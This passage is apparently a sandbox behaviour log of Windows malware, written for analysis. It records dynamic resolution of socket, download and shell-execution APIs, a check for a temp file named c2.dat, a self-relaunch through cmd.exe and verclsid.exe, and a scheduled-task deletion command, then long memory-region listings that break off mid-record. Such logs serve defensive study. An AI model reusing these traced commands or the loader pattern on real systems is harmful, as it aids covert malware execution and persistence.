[0381.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0381.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x1e58d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="setsockopt", lpUsedDefaultChar=0x0) returned 10
[0381.253] GetProcAddress (hModule=0x7fef79b0000, lpProcName="setsockopt") returned 0x7fef79b1664
[0381.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0381.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x1e58d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAStartup", lpUsedDefaultChar=0x0) returned 10
[0381.253] GetProcAddress (hModule=0x7fef79b0000, lpProcName="WSAStartup") returned 0x7feffa14980
[0381.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0381.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x1e58d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="socket", lpUsedDefaultChar=0x0) returned 6
[0381.253] GetProcAddress (hModule=0x7fef79b0000, lpProcName="socket") returned 0x7feffa1de90
[0381.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0381.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x1e58d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSACleanup", lpUsedDefaultChar=0x0) returned 10
[0381.254] GetProcAddress (hModule=0x7fef79b0000, lpProcName="WSACleanup") returned 0x7feffa14cc0
[0381.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostbyname", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0381.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostbyname", cchWideChar=13, lpMultiByteStr=0x1e58d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gethostbyname", lpUsedDefaultChar=0x0) returned 13
[0381.254] GetProcAddress (hModule=0x7fef79b0000, lpProcName="gethostbyname") returned 0x7feffa18df0
[0381.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4
[0381.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x1e58d00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="send", lpUsedDefaultChar=0x0) returned 4
[0381.254] GetProcAddress (hModule=0x7fef79b0000, lpProcName="send") returned 0x7feffa18000
[0381.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7
[0381.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x1e58d00, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="connect", lpUsedDefaultChar=0x0) returned 7
[0381.255] GetProcAddress (hModule=0x7fef79b0000, lpProcName="connect") returned 0x7feffa145c0
[0381.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4
[0381.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x1e58d00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recv", lpUsedDefaultChar=0x0) returned 4
[0381.255] GetProcAddress (hModule=0x7fef79b0000, lpProcName="recv") returned 0x7fef79b1744
[0381.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0381.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostname", cchWideChar=11, lpMultiByteStr=0x1e58d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gethostname", lpUsedDefaultChar=0x0) returned 11
[0381.255] GetProcAddress (hModule=0x7fef79b0000, lpProcName="gethostname") returned 0x7feffa1ae20
[0381.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_ntoa", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
[0381.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_ntoa", cchWideChar=9, lpMultiByteStr=0x1e58d00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inet_ntoa", lpUsedDefaultChar=0x0) returned 9
[0381.255] GetProcAddress (hModule=0x7fef79b0000, lpProcName="inet_ntoa") returned 0x7feffa1d9a0
[0381.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
[0381.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x1e58d00, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntohs", lpUsedDefaultChar=0x0) returned 5
[0381.256] GetProcAddress (hModule=0x7fef79b0000, lpProcName="ntohs") returned 0x7feffa11250
[0381.256] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15
[0381.256] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x1e58d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAGetLastError", lpUsedDefaultChar=0x0) returned 15
[0381.256] GetProcAddress (hModule=0x7fef79b0000, lpProcName="WSAGetLastError") returned 0x7feffa11290
[0381.256] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0381.256] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x1e58d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getpeername", lpUsedDefaultChar=0x0) returned 11
[0381.256] GetProcAddress (hModule=0x7fef79b0000, lpProcName="getpeername") returned 0x7feffa3e450
[0381.256] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0381.256] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x1e58d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getsockname", lpUsedDefaultChar=0x0) returned 11
[0381.256] GetProcAddress (hModule=0x7fef79b0000, lpProcName="getsockname") returned 0x7feffa19480
[0381.256] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7fefe1f0000
[0381.311] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ShellExecuteW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0381.311] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ShellExecuteW", cchWideChar=13, lpMultiByteStr=0x1e58d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExecuteW", lpUsedDefaultChar=0x0) returned 13
[0381.311] GetProcAddress (hModule=0x7fefe1f0000, lpProcName="ShellExecuteW") returned 0x7fefe20983c
[0381.312] LoadLibraryW (lpLibFileName="URLMON.DLL") returned 0x7fefdba0000
[0381.346] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="URLDownloadToFileW", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0381.347] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="URLDownloadToFileW", cchWideChar=18, lpMultiByteStr=0x1e58d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="URLDownloadToFileW", lpUsedDefaultChar=0x0) returned 18
[0381.347] GetProcAddress (hModule=0x7fefdba0000, lpProcName="URLDownloadToFileW") returned 0x7fefdc395e4
[0381.347] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7fefe1f0000
[0381.347] LoadLibraryW (lpLibFileName="shlwapi.dll") returned 0x7feff630000
[0381.347] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="StrRetToStrW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0381.347] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="StrRetToStrW", cchWideChar=12, lpMultiByteStr=0x1e58d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StrRetToStrW", lpUsedDefaultChar=0x0) returned 12
[0381.347] GetProcAddress (hModule=0x7feff630000, lpProcName="StrRetToStrW") returned 0x7feff641078
[0381.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetDesktopFolder", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0381.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetDesktopFolder", cchWideChar=18, lpMultiByteStr=0x1e58d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetDesktopFolder", lpUsedDefaultChar=0x0) returned 18
[0381.348] GetProcAddress (hModule=0x7fefe1f0000, lpProcName="SHGetDesktopFolder") returned 0x7fefe218660
[0381.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderLocation", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19
[0381.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderLocation", cchWideChar=19, lpMultiByteStr=0x1e58d00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetFolderLocation", lpUsedDefaultChar=0x0) returned 19
[0381.348] GetProcAddress (hModule=0x7fefe1f0000, lpProcName="SHGetFolderLocation") returned 0x7fefe27a274
[0381.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHParseDisplayName", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0381.349] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHParseDisplayName", cchWideChar=18, lpMultiByteStr=0x1e58d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHParseDisplayName", lpUsedDefaultChar=0x0) returned 18
[0381.349] GetProcAddress (hModule=0x7fefe1f0000, lpProcName="SHParseDisplayName") returned 0x7fefe274570
[0381.349] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x7fefdf10000
[0381.349] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitialize", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0381.349] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitialize", cchWideChar=12, lpMultiByteStr=0x1e58d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitialize", lpUsedDefaultChar=0x0) returned 12
[0381.349] GetProcAddress (hModule=0x7fefdf10000, lpProcName="CoInitialize") returned 0x7fefdf2a51c
[0381.351] LoadLibraryW (lpLibFileName="iphlpapi.dll") returned 0x7fefb2c0000
[0381.362] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTcpTable", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0381.362] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTcpTable", cchWideChar=11, lpMultiByteStr=0x1e58d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetTcpTable", lpUsedDefaultChar=0x0) returned 11
[0381.362] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="GetTcpTable") returned 0x7fefb2d13ac
[0381.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTcpEntry", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0381.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTcpEntry", cchWideChar=11, lpMultiByteStr=0x1e58d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetTcpEntry", lpUsedDefaultChar=0x0) returned 11
[0381.363] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="SetTcpEntry") returned 0x7fefb2d2fb0
[0381.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCreateFile", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14
[0381.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCreateFile", cchWideChar=14, lpMultiByteStr=0x1e58d00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpCreateFile", lpUsedDefaultChar=0x0) returned 14
[0381.363] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="IcmpCreateFile") returned 0x7fefb2c8250
[0381.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCloseHandle", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15
[0381.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCloseHandle", cchWideChar=15, lpMultiByteStr=0x1e58d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpCloseHandle", lpUsedDefaultChar=0x0) returned 15
[0381.363] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="IcmpCloseHandle") returned 0x7fefb2c7cc0
[0381.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpSendEcho", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0381.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpSendEcho", cchWideChar=12, lpMultiByteStr=0x1e58d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpSendEcho", lpUsedDefaultChar=0x0) returned 12
[0381.364] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="IcmpSendEcho") returned 0x7fefb2c8340
[0381.364] DisableThreadLibraryCalls (hLibModule=0x1b90000) returned 1
[0381.364] GetCommandLineW () returned="verclsid.exe /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0381.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="Control_RunDLL", cbMultiByte=14, lpWideCharStr=0x24ca40, cchWideChar=2047 | out: lpWideCharStr="Control_RunDLL") returned 14
[0381.366] DllGetClassObject (in: rclsid=0x387110*(Data1=0xa78ed123, Data2=0xab77, Data3=0x406b, Data4=([0]=0x99, [1]=0x99, [2]=0x2a, [3]=0x5d, [4]=0x9d, [5]=0x2f, [6]=0x7f, [7]=0xb7)), riid=0x7fefe096cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24e710 | out: ppv=0x24e710*=0x0) returned 0x0
[0381.366] GetCommandLineW () returned="verclsid.exe /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0381.367] FindWindowW (lpClassName="msprotB7", lpWindowName="") returned 0x0
[0381.368] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x24e2e6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0381.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0381.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x1e2d9e0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", lpUsedDefaultChar=0x0) returned 43
[0381.369] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cbMultiByte=43, lpWideCharStr=0x24d200, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat") returned 43
[0381.369] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\c2.dat"), lpFindFileData=0x24e290 | out: lpFindFileData=0x24e290*(dwFileAttributes=0x386a30, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x386a30, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1ba36fd, nFileSizeHigh=0x0, nFileSizeLow=0x24e2b0, dwReserved0=0x0, dwReserved1=0x24e2d8, cFileName="", cAlternateFileName="߾")) returned 0xffffffffffffffff
[0381.373] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="cmd.exe", lpParameters="/c start \"\" verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} & Exit", lpDirectory=0x0, nShowCmd=0) returned 0x2a
Thread:
id = 107
os_tid = 0xcd8
Thread:
id = 108
os_tid = 0xd0c
Thread:
id = 109
os_tid = 0xd04
Process:
id = "15"
image_name = "schtasks.exe"
filename = "c:\\windows\\system32\\schtasks.exe"
page_root = "0x74c64000"
os_pid = "0xce4"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "9"
os_parent_pid = "0xb34"
cmd_line = "schtasks /Delete /TN \\Z11 /f"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2069
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2070
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2071
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2072
start_va = 0x1d0000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 2073
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2074
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2075
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2076
start_va = 0xffa50000
end_va = 0xffa97fff
monitored = 1
entry_point = 0xffa7966c
region_type = mapped_file
name = "schtasks.exe"
filename = "\\Windows\\System32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")
Region:
id = 2077
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2078
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2079
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 2080
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 2081
start_va = 0x50000
end_va = 0x17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 2082
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2083
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2084
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2085
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2086
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2087
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2088
start_va = 0x250000
end_va = 0x2b6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2089
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2090
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2091
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2092
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2093
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2094
